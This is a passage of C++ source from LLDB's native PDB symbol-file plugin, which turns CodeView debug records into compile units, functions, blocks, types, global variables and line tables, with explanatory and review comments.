    ts_or_err->SetSymbolFile(this);
    auto *clang = llvm::cast_or_null<TypeSystemClang>(&ts_or_err.get());
    lldbassert(clang);
    m_ast = std::make_unique<PdbAstBuilder>(*m_objfile_sp, *m_index, *clang);
  }
}
// Number of real compile units in the PDB, excluding the synthetic
// "* Linker *" module the linker may append.
uint32_t SymbolFileNativePDB::CalculateNumCompileUnits() {
  const DbiModuleList &modules = m_index->dbi().modules();
  uint32_t count = modules.getModuleCount();
  if (count == 0)
    return count;

  // The linker can inject an additional "dummy" compilation unit into the
  // PDB. Ignore this special compile unit for our purposes, if it is there.
  // It is always the last one.
  DbiModuleDescriptor last = modules.getModuleDescriptor(count - 1);
  if (last.getModuleName() == "* Linker *")
    --count;
  return count;
}
// Materialize the lldb_private::Block for a PDB block/function symbol,
// creating parents recursively and caching the result in m_blocks.
Block &SymbolFileNativePDB::CreateBlock(PdbCompilandSymId block_id) {
  CompilandIndexItem *cii = m_index->compilands().GetCompiland(block_id.modi);
  CVSymbol sym = cii->m_debug_stream.readSymbolAtOffset(block_id.offset);

  if (sym.kind() == S_GPROC32 || sym.kind() == S_LPROC32) {
    // This is a function. It must be global. Creating the Function entry for
    // it automatically creates a block for it.
    CompUnitSP comp_unit = GetOrCreateCompileUnit(*cii);
    return GetOrCreateFunction(block_id, *comp_unit)->GetBlock(false);
  }

  lldbassert(sym.kind() == S_BLOCK32);

  // This is a block. Its parent is either a function or another block. In
  // either case, its parent can be viewed as a block (e.g. a function contains
  // 1 big block. So just get the parent block and add this block to it.
  BlockSym block(static_cast<SymbolRecordKind>(sym.kind()));
  cantFail(SymbolDeserializer::deserializeAs<BlockSym>(sym, block));
  lldbassert(block.Parent != 0);
  PdbCompilandSymId parent_id(block_id.modi, block.Parent);
  Block &parent_block = GetOrCreateBlock(parent_id);
  lldb::user_id_t opaque_block_uid = toOpaqueUid(block_id);
  BlockSP child_block = std::make_shared<Block>(opaque_block_uid);
  parent_block.AddChild(child_block);
  m_ast->GetOrCreateBlockDecl(block_id);
  m_blocks.insert({opaque_block_uid, child_block});
  return *child_block;
}
// Build an lldb_private::Function from a PDB proc symbol: resolve its
// address range and signature type, register it with the compile unit and
// the AST builder. Returns nullptr when the record is unusable.
lldb::FunctionSP SymbolFileNativePDB::CreateFunction(PdbCompilandSymId func_id,
                                                     CompileUnit &comp_unit) {
  const CompilandIndexItem *cci =
      m_index->compilands().GetCompiland(func_id.modi);
  lldbassert(cci);
  CVSymbol sym_record = cci->m_debug_stream.readSymbolAtOffset(func_id.offset);

  lldbassert(sym_record.kind() == S_LPROC32 || sym_record.kind() == S_GPROC32);
  SegmentOffsetLength sol = GetSegmentOffsetAndLength(sym_record);

  auto file_vm_addr = m_index->MakeVirtualAddress(sol.so);
  if (file_vm_addr == LLDB_INVALID_ADDRESS || file_vm_addr == 0)
    return nullptr;

  AddressRange func_range(file_vm_addr, sol.length,
                          comp_unit.GetModule()->GetSectionList());
  if (!func_range.GetBaseAddress().IsValid())
    return nullptr;

  ProcSym proc(static_cast<SymbolRecordKind>(sym_record.kind()));
  cantFail(SymbolDeserializer::deserializeAs<ProcSym>(sym_record, proc));
  if (proc.FunctionType == TypeIndex::None())
    return nullptr;
  TypeSP func_type = GetOrCreateType(proc.FunctionType);
  if (!func_type)
    return nullptr;

  PdbTypeSymId sig_id(proc.FunctionType, false);
  Mangled mangled(proc.Name);
  FunctionSP func_sp = std::make_shared<Function>(
      &comp_unit, toOpaqueUid(func_id), toOpaqueUid(sig_id), mangled,
      func_type.get(), func_range);

  comp_unit.AddFunction(func_sp);

  m_ast->GetOrCreateFunctionDecl(func_id);

  return func_sp;
}
// Build a CompileUnit from a compiland: derive language and optimization
// flags from the compile options and register it at the module index.
CompUnitSP
SymbolFileNativePDB::CreateCompileUnit(const CompilandIndexItem &cci) {
  lldb::LanguageType lang =
      cci.m_compile_opts ? TranslateLanguage(cci.m_compile_opts->getLanguage())
                         : lldb::eLanguageTypeUnknown;

  LazyBool optimized = eLazyBoolNo;
  if (cci.m_compile_opts && cci.m_compile_opts->hasOptimizations())
    optimized = eLazyBoolYes;

  llvm::SmallString<64> source_file_name =
      m_index->compilands().GetMainSourceFile(cci);
  FileSpec fs(source_file_name);

  CompUnitSP cu_sp =
      std::make_shared<CompileUnit>(m_objfile_sp->GetModule(), nullptr, fs,
                                    toOpaqueUid(cci.m_id), lang, optimized);

  SetCompileUnitAtIndex(cci.m_id.modi, cu_sp);
  return cu_sp;
}
// Wrap a modified (const/volatile/etc.) type: resolve the underlying type
// and reuse its size, naming the result after the modified type.
lldb::TypeSP SymbolFileNativePDB::CreateModifierType(PdbTypeSymId type_id,
                                                     const ModifierRecord &mr,
                                                     CompilerType ct) {
  TpiStream &stream = m_index->tpi();

  std::string name;
  if (mr.ModifiedType.isSimple())
    name = std::string(GetSimpleTypeName(mr.ModifiedType.getSimpleKind()));
  else
    name = computeTypeName(stream.typeCollection(), mr.ModifiedType);
  Declaration decl;
  lldb::TypeSP modified_type = GetOrCreateType(mr.ModifiedType);

  return std::make_shared<Type>(toOpaqueUid(type_id), this, ConstString(name),
                                modified_type->GetByteSize(nullptr), nullptr,
                                LLDB_INVALID_UID, Type::eEncodingIsUID, decl,
                                ct, Type::ResolveState::Full);
}
// Build a pointer (or pointer-to-member) type; the pointee, and for member
// pointers the containing class, are created eagerly.
lldb::TypeSP
SymbolFileNativePDB::CreatePointerType(PdbTypeSymId type_id,
                                       const llvm::codeview::PointerRecord &pr,
                                       CompilerType ct) {
  TypeSP pointee = GetOrCreateType(pr.ReferentType);
  if (!pointee)
    return nullptr;

  if (pr.isPointerToMember()) {
    MemberPointerInfo mpi = pr.getMemberInfo();
    GetOrCreateType(mpi.ContainingType);
  }

  Declaration decl;
  return std::make_shared<Type>(toOpaqueUid(type_id), this, ConstString(),
                                pr.getSize(), nullptr, LLDB_INVALID_UID,
                                Type::eEncodingIsUID, decl, ct,
                                Type::ResolveState::Full);
}
// Build a Type for a CodeView "simple" index: nullptr_t, pointer-mode
// simple types (32/64-bit only), or a plain builtin scalar.
lldb::TypeSP SymbolFileNativePDB::CreateSimpleType(TypeIndex ti,
                                                   CompilerType ct) {
  uint64_t uid = toOpaqueUid(PdbTypeSymId(ti, false));
  if (ti == TypeIndex::NullptrT()) {
    Declaration decl;
    return std::make_shared<Type>(
        uid, this, ConstString("std::nullptr_t"), 0, nullptr, LLDB_INVALID_UID,
        Type::eEncodingIsUID, decl, ct, Type::ResolveState::Full);
  }

  if (ti.getSimpleMode() != SimpleTypeMode::Direct) {
    // A non-direct mode means this is a pointer to the underlying simple
    // kind; only 32- and 64-bit pointer modes are supported.
    TypeSP direct_sp = GetOrCreateType(ti.makeDirect());
    uint32_t pointer_size = 0;
    switch (ti.getSimpleMode()) {
    case SimpleTypeMode::FarPointer32:
    case SimpleTypeMode::NearPointer32:
      pointer_size = 4;
      break;
    case SimpleTypeMode::NearPointer64:
      pointer_size = 8;
      break;
    default:
      // 128-bit and 16-bit pointers unsupported.
      return nullptr;
    }
    Declaration decl;
    return std::make_shared<Type>(
        uid, this, ConstString(), pointer_size, nullptr, LLDB_INVALID_UID,
        Type::eEncodingIsUID, decl, ct, Type::ResolveState::Full);
  }

  if (ti.getSimpleKind() == SimpleTypeKind::NotTranslated)
    return nullptr;

  size_t size = GetTypeSizeForSimpleKind(ti.getSimpleKind());
  llvm::StringRef type_name = GetSimpleTypeName(ti.getSimpleKind());

  Declaration decl;
  return std::make_shared<Type>(uid, this, ConstString(type_name), size,
                                nullptr, LLDB_INVALID_UID, Type::eEncodingIsUID,
                                decl, ct, Type::ResolveState::Full);
}
// Strip namespace/class qualifiers from a tag record's name, preferring to
// demangle the unique (mangled) name and falling back to parsing the
// display name when no unique name exists or demangling fails.
static std::string GetUnqualifiedTypeName(const TagRecord &record) {
  if (!record.hasUniqueName()) {
    MSVCUndecoratedNameParser parser(record.Name);
    llvm::ArrayRef<MSVCUndecoratedNameSpecifier> specs = parser.GetSpecifiers();

    return std::string(specs.back().GetBaseName());
  }

  llvm::ms_demangle::Demangler demangler;
  StringView sv(record.UniqueName.begin(), record.UniqueName.size());
  llvm::ms_demangle::TagTypeNode *ttn = demangler.parseTagUniqueName(sv);
  if (demangler.Error)
    return std::string(record.Name);

  llvm::ms_demangle::IdentifierNode *idn =
      ttn->QualifiedName->getUnqualifiedIdentifier();
  return idn->toString();
}
// Shared implementation for class/struct/union tag types; created in the
// Forward state and completed lazily on demand.
lldb::TypeSP
SymbolFileNativePDB::CreateClassStructUnion(PdbTypeSymId type_id,
                                            const TagRecord &record,
                                            size_t size, CompilerType ct) {
  std::string uname = GetUnqualifiedTypeName(record);

  // FIXME: Search IPI stream for LF_UDT_MOD_SRC_LINE.
  Declaration decl;
  return std::make_shared<Type>(toOpaqueUid(type_id), this, ConstString(uname),
                                size, nullptr, LLDB_INVALID_UID,
                                Type::eEncodingIsUID, decl, ct,
                                Type::ResolveState::Forward);
}
// LF_CLASS / LF_STRUCTURE: delegate to the shared tag-type builder.
lldb::TypeSP SymbolFileNativePDB::CreateTagType(PdbTypeSymId type_id,
                                                const ClassRecord &cr,
                                                CompilerType ct) {
  return CreateClassStructUnion(type_id, cr, cr.getSize(), ct);
}
// LF_UNION: delegate to the shared tag-type builder.
lldb::TypeSP SymbolFileNativePDB::CreateTagType(PdbTypeSymId type_id,
                                                const UnionRecord &ur,
                                                CompilerType ct) {
  return CreateClassStructUnion(type_id, ur, ur.getSize(), ct);
}
// LF_ENUM: the byte size comes from the enum's underlying integer type.
// NOTE(review): assumes GetOrCreateType resolves the underlying type; it
// can return null for untranslatable types -- verify callers never hit that.
lldb::TypeSP SymbolFileNativePDB::CreateTagType(PdbTypeSymId type_id,
                                                const EnumRecord &er,
                                                CompilerType ct) {
  std::string uname = GetUnqualifiedTypeName(er);
  Declaration decl;
  TypeSP underlying_type = GetOrCreateType(er.UnderlyingType);
  return std::make_shared<lldb_private::Type>(
      toOpaqueUid(type_id), this, ConstString(uname),
      underlying_type->GetByteSize(nullptr), nullptr, LLDB_INVALID_UID,
      lldb_private::Type::eEncodingIsUID, decl, ct,
      lldb_private::Type::ResolveState::Forward);
}
// LF_ARRAY: builds an array Type whose encoding type is the element type.
TypeSP SymbolFileNativePDB::CreateArrayType(PdbTypeSymId type_id,
                                            const ArrayRecord &ar,
                                            CompilerType ct) {
  TypeSP element_type = GetOrCreateType(ar.ElementType);
  Declaration decl;
  // ar.Size is the total size of the array in bytes.
  TypeSP array_sp = std::make_shared<lldb_private::Type>(
      toOpaqueUid(type_id), this, ConstString(), ar.Size, nullptr,
      LLDB_INVALID_UID, lldb_private::Type::eEncodingIsUID, decl, ct,
      lldb_private::Type::ResolveState::Full);
  array_sp->SetEncodingType(element_type.get());
  return array_sp;
}
// LF_MFUNCTION (member function signature): zero-sized Type wrapping the
// already-built CompilerType.
TypeSP SymbolFileNativePDB::CreateFunctionType(PdbTypeSymId type_id,
                                               const MemberFunctionRecord &mfr,
                                               CompilerType ct) {
  Declaration decl;
  return std::make_shared<lldb_private::Type>(
      toOpaqueUid(type_id), this, ConstString(), 0, nullptr, LLDB_INVALID_UID,
      lldb_private::Type::eEncodingIsUID, decl, ct,
      lldb_private::Type::ResolveState::Full);
}
// LF_PROCEDURE (free function signature): zero-sized Type wrapping the
// already-built CompilerType.
TypeSP SymbolFileNativePDB::CreateProcedureType(PdbTypeSymId type_id,
                                                const ProcedureRecord &pr,
                                                CompilerType ct) {
  Declaration decl;
  return std::make_shared<lldb_private::Type>(
      toOpaqueUid(type_id), this, ConstString(), 0, nullptr, LLDB_INVALID_UID,
      lldb_private::Type::eEncodingIsUID, decl, ct,
      lldb_private::Type::ResolveState::Full);
}
// Central dispatcher: deserializes the CodeView record behind |type_id|
// and routes it to the matching Create* helper. Returns nullptr for
// record kinds this plugin does not translate.
TypeSP SymbolFileNativePDB::CreateType(PdbTypeSymId type_id, CompilerType ct) {
  if (type_id.index.isSimple())
    return CreateSimpleType(type_id.index, ct);
  // Item (IPI) ids and type (TPI) ids live in different streams.
  TpiStream &stream = type_id.is_ipi ? m_index->ipi() : m_index->tpi();
  CVType cvt = stream.getType(type_id.index);
  if (cvt.kind() == LF_MODIFIER) {
    ModifierRecord modifier;
    llvm::cantFail(
        TypeDeserializer::deserializeAs<ModifierRecord>(cvt, modifier));
    return CreateModifierType(type_id, modifier, ct);
  }
  if (cvt.kind() == LF_POINTER) {
    PointerRecord pointer;
    llvm::cantFail(
        TypeDeserializer::deserializeAs<PointerRecord>(cvt, pointer));
    return CreatePointerType(type_id, pointer, ct);
  }
  // IsClassRecord groups the class-like leaf kinds (class/struct/...).
  if (IsClassRecord(cvt.kind())) {
    ClassRecord cr;
    llvm::cantFail(TypeDeserializer::deserializeAs<ClassRecord>(cvt, cr));
    return CreateTagType(type_id, cr, ct);
  }
  if (cvt.kind() == LF_ENUM) {
    EnumRecord er;
    llvm::cantFail(TypeDeserializer::deserializeAs<EnumRecord>(cvt, er));
    return CreateTagType(type_id, er, ct);
  }
  if (cvt.kind() == LF_UNION) {
    UnionRecord ur;
    llvm::cantFail(TypeDeserializer::deserializeAs<UnionRecord>(cvt, ur));
    return CreateTagType(type_id, ur, ct);
  }
  if (cvt.kind() == LF_ARRAY) {
    ArrayRecord ar;
    llvm::cantFail(TypeDeserializer::deserializeAs<ArrayRecord>(cvt, ar));
    return CreateArrayType(type_id, ar, ct);
  }
  if (cvt.kind() == LF_PROCEDURE) {
    ProcedureRecord pr;
    llvm::cantFail(TypeDeserializer::deserializeAs<ProcedureRecord>(cvt, pr));
    return CreateProcedureType(type_id, pr, ct);
  }
  if (cvt.kind() == LF_MFUNCTION) {
    MemberFunctionRecord mfr;
    llvm::cantFail(TypeDeserializer::deserializeAs<MemberFunctionRecord>(cvt, mfr));
    return CreateFunctionType(type_id, mfr, ct);
  }
  // Unhandled leaf kind.
  return nullptr;
}
// Creates the Type for |type_id| and records it in m_types. Forward
// references are mapped to their full declaration when one exists, and
// both UIDs are cached pointing at the same TypeSP.
TypeSP SymbolFileNativePDB::CreateAndCacheType(PdbTypeSymId type_id) {
  // If they search for a UDT which is a forward ref, try and resolve the full
  // decl and just map the forward ref uid to the full decl record.
  llvm::Optional<PdbTypeSymId> full_decl_uid;
  if (IsForwardRefUdt(type_id, m_index->tpi())) {
    auto expected_full_ti =
        m_index->tpi().findFullDeclForForwardRef(type_id.index);
    if (!expected_full_ti)
      llvm::consumeError(expected_full_ti.takeError());
    else if (*expected_full_ti != type_id.index) {
      full_decl_uid = PdbTypeSymId(*expected_full_ti, false);
      // It's possible that a lookup would occur for the full decl causing it
      // to be cached, then a second lookup would occur for the forward decl.
      // We don't want to create a second full decl, so make sure the full
      // decl hasn't already been cached.
      auto full_iter = m_types.find(toOpaqueUid(*full_decl_uid));
      if (full_iter != m_types.end()) {
        TypeSP result = full_iter->second;
        // Map the forward decl to the TypeSP for the full decl so we can take
        // the fast path next time.
        m_types[toOpaqueUid(type_id)] = result;
        return result;
      }
    }
  }
  PdbTypeSymId best_decl_id = full_decl_uid ? *full_decl_uid : type_id;
  // Build the clang-level type first, then wrap it in an lldb Type.
  clang::QualType qt = m_ast->GetOrCreateType(best_decl_id);
  TypeSP result = CreateType(best_decl_id, m_ast->ToCompilerType(qt));
  if (!result)
    return nullptr;
  uint64_t best_uid = toOpaqueUid(best_decl_id);
  m_types[best_uid] = result;
  // If we had both a forward decl and a full decl, make both point to the new
  // type.
  if (full_decl_uid)
    m_types[toOpaqueUid(type_id)] = result;
  return result;
}
// Cache-aware entry point for type construction; also registers newly
// created types with the module's TypeList.
TypeSP SymbolFileNativePDB::GetOrCreateType(PdbTypeSymId type_id) {
  // We can't use try_emplace / overwrite here because the process of creating
  // a type could create nested types, which could invalidate iterators. So
  // we have to do a 2-phase lookup / insert.
  auto iter = m_types.find(toOpaqueUid(type_id));
  if (iter != m_types.end())
    return iter->second;
  TypeSP type = CreateAndCacheType(type_id);
  if (type)
    GetTypeList().Insert(type);
  return type;
}
// Builds a Variable for a global data symbol (S_GDATA32 / S_LDATA32 /
// S_GTHREAD32 / S_LTHREAD32). S_CONSTANT records are routed to
// CreateConstantSymbol instead. The owning compile unit is recovered
// from the symbol's virtual address when possible.
VariableSP SymbolFileNativePDB::CreateGlobalVariable(PdbGlobalSymId var_id) {
  CVSymbol sym = m_index->symrecords().readRecord(var_id.offset);
  if (sym.kind() == S_CONSTANT)
    return CreateConstantSymbol(var_id, sym);
  lldb::ValueType scope = eValueTypeInvalid;
  TypeIndex ti;
  llvm::StringRef name;
  lldb::addr_t addr = 0;
  uint16_t section = 0;
  uint32_t offset = 0;
  bool is_external = false;
  switch (sym.kind()) {
  case S_GDATA32:
    is_external = true;
    LLVM_FALLTHROUGH;
  case S_LDATA32: {
    DataSym ds(sym.kind());
    llvm::cantFail(SymbolDeserializer::deserializeAs<DataSym>(sym, ds));
    ti = ds.Type;
    scope = (sym.kind() == S_GDATA32) ? eValueTypeVariableGlobal
                                      : eValueTypeVariableStatic;
    name = ds.Name;
    section = ds.Segment;
    offset = ds.DataOffset;
    addr = m_index->MakeVirtualAddress(ds.Segment, ds.DataOffset);
    break;
  }
  case S_GTHREAD32:
    is_external = true;
    LLVM_FALLTHROUGH;
  case S_LTHREAD32: {
    ThreadLocalDataSym tlds(sym.kind());
    llvm::cantFail(
        SymbolDeserializer::deserializeAs<ThreadLocalDataSym>(sym, tlds));
    ti = tlds.Type;
    name = tlds.Name;
    section = tlds.Segment;
    offset = tlds.DataOffset;
    addr = m_index->MakeVirtualAddress(tlds.Segment, tlds.DataOffset);
    scope = eValueTypeVariableThreadLocal;
    break;
  }
  default:
    // Callers only pass data-symbol kinds; anything else is a logic error.
    llvm_unreachable("unreachable!");
  }
  CompUnitSP comp_unit;
  llvm::Optional<uint16_t> modi = m_index->GetModuleIndexForVa(addr);
  if (modi) {
    CompilandIndexItem &cci = m_index->compilands().GetOrCreateCompiland(*modi);
    comp_unit = GetOrCreateCompileUnit(cci);
  }
  Declaration decl;
  PdbTypeSymId tid(ti, false);
  SymbolFileTypeSP type_sp =
      std::make_shared<SymbolFileType>(*this, toOpaqueUid(tid));
  Variable::RangeList ranges;
  m_ast->GetOrCreateVariableDecl(var_id);
  DWARFExpression location = MakeGlobalLocationExpression(
      section, offset, GetObjectFile()->GetModule());
  // Globals get a "::" prefixed name for scope-qualified lookup.
  std::string global_name("::");
  global_name += name;
  VariableSP var_sp = std::make_shared<Variable>(
      toOpaqueUid(var_id), name.str().c_str(), global_name.c_str(), type_sp,
      scope, comp_unit.get(), ranges, &decl, location, is_external, false,
      false);
  var_sp->SetLocationIsConstantValueData(false);
  return var_sp;
}
// Builds a Variable for an S_CONSTANT record; its location expression
// embeds the constant value itself rather than an address.
lldb::VariableSP
SymbolFileNativePDB::CreateConstantSymbol(PdbGlobalSymId var_id,
                                          const CVSymbol &cvs) {
  TpiStream &tpi = m_index->tpi();
  ConstantSym constant(cvs.kind());
  llvm::cantFail(SymbolDeserializer::deserializeAs<ConstantSym>(cvs, constant));
  std::string global_name("::");
  global_name += constant.Name;
  PdbTypeSymId tid(constant.Type, false);
  SymbolFileTypeSP type_sp =
      std::make_shared<SymbolFileType>(*this, toOpaqueUid(tid));
  Declaration decl;
  Variable::RangeList ranges;
  ModuleSP module = GetObjectFile()->GetModule();
  DWARFExpression location = MakeConstantLocationExpression(
      constant.Type, tpi, constant.Value, module);
  VariableSP var_sp = std::make_shared<Variable>(
      toOpaqueUid(var_id), constant.Name.str().c_str(), global_name.c_str(),
      type_sp, eValueTypeVariableGlobal, module.get(), ranges, &decl, location,
      false, false, false);
  // Mark the location as holding the value directly, not an address.
  var_sp->SetLocationIsConstantValueData(true);
  return var_sp;
}
// Cache-aware wrapper around CreateGlobalVariable.
// NOTE(review): if CreateGlobalVariable ever inserts into m_global_vars
// reentrantly, the iterator held across the call could be invalidated --
// presumably it does not; verify before relying on it.
VariableSP
SymbolFileNativePDB::GetOrCreateGlobalVariable(PdbGlobalSymId var_id) {
  auto emplace_result = m_global_vars.try_emplace(toOpaqueUid(var_id), nullptr);
  if (emplace_result.second)
    emplace_result.first->second = CreateGlobalVariable(var_id);
  return emplace_result.first->second;
}
// Convenience overload: a bare TypeIndex always refers to the TPI stream.
lldb::TypeSP SymbolFileNativePDB::GetOrCreateType(TypeIndex ti) {
  return GetOrCreateType(PdbTypeSymId(ti, false));
}
// Cache-aware wrapper around CreateFunction, keyed by the function's
// opaque compiland-symbol UID.
FunctionSP SymbolFileNativePDB::GetOrCreateFunction(PdbCompilandSymId func_id,
                                                    CompileUnit &comp_unit) {
  auto emplace_result = m_functions.try_emplace(toOpaqueUid(func_id), nullptr);
  if (emplace_result.second)
    emplace_result.first->second = CreateFunction(func_id, comp_unit);
  return emplace_result.first->second;
}
// Cache-aware wrapper around CreateCompileUnit. Unlike functions, a
// compile unit must always be creatable, hence the assert.
CompUnitSP
SymbolFileNativePDB::GetOrCreateCompileUnit(const CompilandIndexItem &cci) {
  auto emplace_result =
      m_compilands.try_emplace(toOpaqueUid(cci.m_id), nullptr);
  if (emplace_result.second)
    emplace_result.first->second = CreateCompileUnit(cci);
  lldbassert(emplace_result.first->second);
  return emplace_result.first->second;
}
// Cache-aware wrapper around CreateBlock.
// NOTE(review): presumably CreateBlock registers the new block in
// m_blocks itself; otherwise every miss would re-create it -- verify.
Block &SymbolFileNativePDB::GetOrCreateBlock(PdbCompilandSymId block_id) {
  auto iter = m_blocks.find(toOpaqueUid(block_id));
  if (iter != m_blocks.end())
    return *iter->second;
  return CreateBlock(block_id);
}
// Eagerly materializes all clang decls inside the given decl context;
// a null (non-clang) context is ignored.
void SymbolFileNativePDB::ParseDeclsForContext(
    lldb_private::CompilerDeclContext decl_ctx) {
  clang::DeclContext *context = m_ast->FromCompilerDeclContext(decl_ctx);
  if (!context)
    return;
  m_ast->ParseDeclsForContext(*context);
}
// Returns (creating if necessary) the compile unit at |index|. Module
// indices in a PDB are 16-bit; the assert fires in debug builds and the
// explicit guard keeps release builds safe.
lldb::CompUnitSP SymbolFileNativePDB::ParseCompileUnitAtIndex(uint32_t index) {
  if (index >= GetNumCompileUnits())
    return CompUnitSP();
  lldbassert(index < UINT16_MAX);
  if (index >= UINT16_MAX)
    return nullptr;
  CompilandIndexItem &item = m_index->compilands().GetOrCreateCompiland(index);
  return GetOrCreateCompileUnit(item);
}
// Returns the source language of a compile unit, translated from the
// compiland's S_COMPILE3 options; Unknown when no options were recorded.
lldb::LanguageType SymbolFileNativePDB::ParseLanguage(CompileUnit &comp_unit) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  PdbSymUid uid(comp_unit.GetID());
  lldbassert(uid.kind() == PdbSymUidKind::Compiland);
  CompilandIndexItem *item =
      m_index->compilands().GetCompiland(uid.asCompiland().modi);
  lldbassert(item);
  if (!item->m_compile_opts)
    return lldb::eLanguageTypeUnknown;
  return TranslateLanguage(item->m_compile_opts->getLanguage());
}
void SymbolFileNativePDB::AddSymbols(Symtab &symtab) { return; }
// Materializes a Function for every S_LPROC32 / S_GPROC32 record in the
// compile unit's module debug stream. Returns how many functions were
// newly added to |comp_unit|.
size_t SymbolFileNativePDB::ParseFunctions(CompileUnit &comp_unit) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  PdbSymUid uid{comp_unit.GetID()};
  lldbassert(uid.kind() == PdbSymUidKind::Compiland);
  uint16_t modi = uid.asCompiland().modi;
  CompilandIndexItem &cii = m_index->compilands().GetOrCreateCompiland(modi);
  size_t count = comp_unit.GetNumFunctions();
  const CVSymbolArray &syms = cii.m_debug_stream.getSymbolArray();
  for (auto iter = syms.begin(); iter != syms.end(); ++iter) {
    if (iter->kind() != S_LPROC32 && iter->kind() != S_GPROC32)
      continue;
    PdbCompilandSymId sym_id{modi, iter.offset()};
    // Creation registers the function with the compile unit as a side
    // effect; the returned shared pointer is intentionally discarded
    // (the previous code bound it to an unused local).
    GetOrCreateFunction(sym_id, comp_unit);
  }
  size_t new_count = comp_unit.GetNumFunctions();
  lldbassert(new_count >= count);
  return new_count - count;
}
// True when any of the requested items can only be produced after the
// compile unit owning the address has been resolved.
static bool NeedsResolvedCompileUnit(uint32_t resolve_scope) {
  const uint32_t cu_dependent_flags =
      eSymbolContextCompUnit | eSymbolContextVariable |
      eSymbolContextFunction | eSymbolContextBlock | eSymbolContextLineEntry;
  return (resolve_scope & cu_dependent_flags) != 0;
}
// Fills in |sc| (compile unit, function, block, line entry) for a file
// address, returning a bitmask of the items actually resolved. An early
// return of 0 means the address maps to no known module.
uint32_t SymbolFileNativePDB::ResolveSymbolContext(
    const Address &addr, SymbolContextItem resolve_scope, SymbolContext &sc) {
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  uint32_t resolved_flags = 0;
  lldb::addr_t file_addr = addr.GetFileAddress();
  if (NeedsResolvedCompileUnit(resolve_scope)) {
    llvm::Optional<uint16_t> modi = m_index->GetModuleIndexForVa(file_addr);
    if (!modi)
      return 0;
    CompilandIndexItem *cci = m_index->compilands().GetCompiland(*modi);
    if (!cci)
      return 0;
    sc.comp_unit = GetOrCreateCompileUnit(*cci).get();
    resolved_flags |= eSymbolContextCompUnit;
  }
  if (resolve_scope & eSymbolContextFunction ||
      resolve_scope & eSymbolContextBlock) {
    lldbassert(sc.comp_unit);
    std::vector<SymbolAndUid> matches = m_index->FindSymbolsByVa(file_addr);
    // Search the matches in reverse. This way if there are multiple matches
    // (for example we are 3 levels deep in a nested scope) it will find the
    // innermost one first.
    for (const auto &match : llvm::reverse(matches)) {
      if (match.uid.kind() != PdbSymUidKind::CompilandSym)
        continue;
      PdbCompilandSymId csid = match.uid.asCompilandSym();
      CVSymbol cvs = m_index->ReadSymbolRecord(csid);
      PDB_SymType type = CVSymToPDBSym(cvs.kind());
      if (type != PDB_SymType::Function && type != PDB_SymType::Block)
        continue;
      if (type == PDB_SymType::Function) {
        sc.function = GetOrCreateFunction(csid, *sc.comp_unit).get();
        sc.block = sc.GetFunctionBlock();
      }
      if (type == PDB_SymType::Block) {
        sc.block = &GetOrCreateBlock(csid);
        sc.function = sc.block->CalculateSymbolContextFunction();
      }
      resolved_flags |= eSymbolContextFunction;
      resolved_flags |= eSymbolContextBlock;
      break;
    }
  }
  if (resolve_scope & eSymbolContextLineEntry) {
    lldbassert(sc.comp_unit);
    if (auto *line_table = sc.comp_unit->GetLineTable()) {
      if (line_table->FindLineEntryByAddress(addr, sc.line_entry))
        resolved_flags |= eSymbolContextLineEntry;
    }
  }
  return resolved_flags;
}
// File/line symbol-context resolution is not implemented yet; reports
// zero matches.
uint32_t SymbolFileNativePDB::ResolveSymbolContext(
    const FileSpec &file_spec, uint32_t line, bool check_inlines,
    lldb::SymbolContextItem resolve_scope, SymbolContextList &sc_list) {
  return 0;
}
// Converts one CodeView line-number entry into an lldb line-table entry
// appended to |sequence|. Compiler-generated step-control entries are
// skipped since they carry no real source location.
static void AppendLineEntryToSequence(LineTable &table, LineSequence &sequence,
                                      const CompilandIndexItem &cci,
                                      lldb::addr_t base_addr,
                                      uint32_t file_number,
                                      const LineFragmentHeader &block,
                                      const LineNumberEntry &cur) {
  LineInfo cur_info(cur.Flags);
  if (cur_info.isAlwaysStepInto() || cur_info.isNeverStepInto())
    return;
  // Entry offsets are relative to the fragment's base address.
  uint64_t addr = base_addr + cur.Offset;
  bool is_statement = cur_info.isStatement();
  bool is_prologue = IsFunctionPrologue(cci, addr);
  bool is_epilogue = IsFunctionEpilogue(cci, addr);
  uint32_t lno = cur_info.getStartLine();
  table.AppendLineEntryToSequence(&sequence, addr, lno, 0, file_number,
                                  is_statement, false, is_prologue, is_epilogue,
                                  false);
}
// Appends the mandatory terminal entry (one past the fragment's code) to
// a line sequence and hands ownership of the sequence to the table.
static void TerminateLineSequence(LineTable &table,
                                  const LineFragmentHeader &block,
                                  lldb::addr_t base_addr, uint32_t file_number,
                                  uint32_t last_line,
                                  std::unique_ptr<LineSequence> seq) {
  // The end is always a terminal entry, so insert it regardless.
  table.AppendLineEntryToSequence(seq.get(), base_addr + block.CodeSize,
                                  last_line, 0, file_number, false, false,
                                  false, false, true);
  table.InsertSequence(seq.release());
}
// Builds the full line table for a compile unit from the DEBUG_S_LINES
// subsections of its module debug stream. Returns false when the stream
// is malformed or yields no entries.
bool SymbolFileNativePDB::ParseLineTable(CompileUnit &comp_unit) {
  // Unfortunately LLDB is set up to parse the entire compile unit line table
  // all at once, even if all it really needs is line info for a specific
  // function. In the future it would be nice if it could set the sc.m_function
  // member, and we could only get the line info for the function in question.
  std::lock_guard<std::recursive_mutex> guard(GetModuleMutex());
  PdbSymUid cu_id(comp_unit.GetID());
  lldbassert(cu_id.kind() == PdbSymUidKind::Compiland);
  CompilandIndexItem *cci =
      m_index->compilands().GetCompiland(cu_id.asCompiland().modi);
  lldbassert(cci);
  auto line_table = std::make_unique<LineTable>(&comp_unit);
  // This is basically a copy of the .debug$S subsections from all original COFF
  // object files merged together with address relocations applied. We are
  // looking for all DEBUG_S_LINES subsections.
  for (const DebugSubsectionRecord &dssr :
       cci->m_debug_stream.getSubsectionsArray()) {
    if (dssr.kind() != DebugSubsectionKind::Lines)
      continue;
    DebugLinesSubsectionRef lines;
    llvm::BinaryStreamReader reader(dssr.getRecordData());
    if (auto EC = lines.initialize(reader)) {
      llvm::consumeError(std::move(EC));
      return false;
    }
    const LineFragmentHeader *lfh = lines.header();
    uint64_t virtual_addr =
        m_index->MakeVirtualAddress(lfh->RelocSegment, lfh->RelocOffset);
    const auto &checksums = cci->m_strings.checksums().getArray();
    const auto &strings = cci->m_strings.strings();
    for (const LineColumnEntry &group : lines) {
      // Indices in this structure are actually offsets of records in the
